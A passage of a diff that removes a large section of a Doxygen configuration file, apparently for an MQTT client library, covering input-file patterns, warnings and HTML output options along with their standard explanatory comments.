-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = 
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = YES
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = NO
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = YES
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = YES
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = YES
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = NO
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = YES
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_internal
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-STRIP_FROM_PATH        = @PROJECT_SOURCE_DIR@/src
-INPUT                  = @PROJECT_SOURCE_DIR@/src
-
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          = *.cc \
-                         *.cxx \
-                         *.cpp \
-                         *.c++ \
-                         *.d \
-                         *.java \
-                         *.ii \
-                         *.ixx \
-                         *.ipp \
-                         *.i++ \
-                         *.inl \
-                         *.h \
-                         *.hh \
-                         *.hxx \
-                         *.hpp \
-                         *.h++ \
-                         *.idl \
-                         *.odl \
-                         *.cs \
-                         *.php \
-                         *.php3 \
-                         *.inc \
-                         *.m \
-                         *.mm \
-                         *.dox \
-                         *.py \
-                         *.f90 \
-                         *.f \
-                         *.vhd \
-                         *.vhdl \
-                         *.C \
-                         *.CC \
-                         *.C++ \
-                         *.II \
-                         *.I++ \
-                         *.H \
-                         *.HH \
-                         *.H++ \
-                         *.CS \
-                         *.PHP \
-                         *.PHP3 \
-                         *.M \
-                         *.MM \
-                         *.PY \
-                         *.F90 \
-                         *.F \
-                         *.VHD \
-                         *.VHDL \
-                         *.c
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
